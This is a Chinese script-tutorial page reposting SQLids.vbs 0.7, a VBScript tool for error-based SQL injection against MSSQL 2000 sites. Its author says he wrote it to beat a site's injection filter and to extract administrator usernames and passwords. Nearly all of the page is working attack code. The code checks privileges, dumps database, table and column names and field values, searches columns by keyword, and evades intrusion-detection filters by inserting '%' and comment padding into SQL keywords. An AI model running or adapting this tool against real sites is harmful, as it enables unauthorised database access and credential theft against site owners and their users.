当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > SQLids.vbs 0.7(最终版,以后改成gui界面的)

VBScript
adodb.stream读文件到数组的代码
利用sql语句复制一条或多条记录
百度空间备份脚本baidublogbak.vbs代码分析
vbs版sql查询分析器lcx作品
最新版利用CDO.Message做的vbs下载者
PDF的VBS小程序代码
算阶乘的vbs小程序
vbs后台运行bat删除自身的代码
VB6 ByVal ByRef函数调用
一段提取用户名和md5的vbs代码
vbs fso跨盘移动文件夹的怪问题
vbs删除文本文件的行的函数
显示运行对话框内保存的命令历史的vbs
emule自动关机脚本
IE中用VBScript不提示直接打印的代码
vbs引用另一个vbs的代码
VBScript 剪贴板抓取URL并在浏览器中打开
奇特的js写法,或许可以用来加密躲杀毒软件什么的
自动写入文件上传到指定服务器SoftwareMeteringCLS.vbs源码
一个查看局域网在线IP的vbs脚本

VBScript 中的 SQLids.vbs 0.7(最终版,以后改成gui界面的)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 144 ::
收藏到网摘: n/a

今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东。 是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
复制代码 代码如下:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If
Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "http://www.ruanchen.com/"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function UrlEncode(str)
str = Replace(str," ","%20")
UrlEncode = str
End Function
Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交
On Error Resume Next
Aurl=Split(url,"?") '这是为post提交的
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'post提交
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadTExt
objstream.Close
Set objstream = Nothing
End Function

Function ReplaceKeyWord(Value)'绕过ids过虑
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
NExt
End Function

Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会
aHTML = Split(sHTMLTEMP, "varchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP = aHTML(1)
aHTML = Split(sHTMLTEMP, "'")
sHTMLTEMP = aHTML(1)
End If
result=sHTMLTEMP
End Function
Function Str2HEx(strHEx)'sql的16进制转换函数
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00"
NExt
Str2HEx = "0x"&sHEx
End Function
Function Str2HExtwo(strHEx)'sql的16进制转换函数
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))
NExt
Str2HExtwo = "0x"&sHEx
End Function

Function MoveR(Rstr) '去重复
Dim i,SpStr
SpStr = Split(Rstr,",")
For i = 0 To Ubound(Spstr)
If I = 0 then
MoveR = MoveR & SpStr(i) & ","
Else
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then
MoveR = MoveR & SpStr(i)
Elseif instr(MoveR,SpStr(i))=0 Then
MoveR = MoveR & SpStr(i) & ","
End If
End If
NExt
End Function

function page(sql)
page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function
url=arg(0)
injection =arg(1)

'--------------------------------------以下代码是注入语句,完全不需要引号
select case arg(1)
Case "limit"
body=Replace(getHTTPPage(url),Chr(34),"")
'语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
Bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
If Len(body)=Len(Bodyone) Then wsh.echo "SA"
If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
wsh.echo "DB_owner"
Else
wsh.echo "PUBLIC"
End If
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=Split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
Do
sql="and db_name("&i&")>0--" '暴库名语句
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "table"
i=1
Do
' 表名语句 agr(2)表示库
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=Replace(biaoid,Chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
wsh.echo "共有列名"&k&"个"
For i=1 To k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
nExt

case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句
k=result(page(sqlcloum))
k=Replace(k,Chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
For i=1 To k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
Body = page(sqlneirong)
wscript.echo Replace(result(body),Chr(94),"")
Next

Case "search"
love=Str2HExtwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
TimeSpend = Timer
For i=1 To 10 '可以根据需要改动这个10
sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("&love&"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--"
Body = page(sqlsearch)
body=result(body)
a=a&body&","
NExt
TimeSpend = round(Timer - TimeSpend,2)
wsh.echo MoveR(a)
wsh.echo "用时:" & TimeSpend & "秒."


Case Else
If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
wscript.echo "注意参数"
usage()
End if
end select